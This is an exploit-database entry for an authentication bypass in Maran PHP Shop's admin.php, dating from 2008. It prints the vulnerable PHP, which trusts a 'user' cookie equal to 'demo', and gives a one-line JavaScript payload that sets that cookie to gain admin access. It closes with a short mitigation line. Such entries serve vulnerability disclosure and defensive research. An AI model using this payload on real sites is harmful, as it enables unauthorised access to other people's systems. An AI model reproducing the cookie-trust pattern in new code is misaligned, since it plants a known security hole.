header-logo
Suggest Exploit
vendor:
PHP Shop
by:
JosS
7.5
CVSS
HIGH
Insecure Cookie Handling
20
CWE
Product Name: PHP Shop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability

The vulnerability exists due to insufficient validation of the user cookie in the admin.php file. An attacker can exploit this vulnerability by setting the user cookie to 'demo' using a malicious JavaScript code.

Mitigation:

Ensure that user cookies are properly validated before being used.
Source

Exploit-DB raw data:

# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
# url: http://www.maran.pamil-visions.com/maranshop.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: /admin.php
vuln code:
<?
$readcookie = $_COOKIE['user'];
if($readcookie!="demo"){echo "error 467. bad login! <a href='login.php'>login here</a>";exit;}
//echo $_COOKIE['user'];
?>

exploit:
javascript:document.cookie = "user=demo; path=/";

Hack0wn :D

# milw0rm.com [2008-11-02]

Navigation

Suggest Exploit

Services By CQR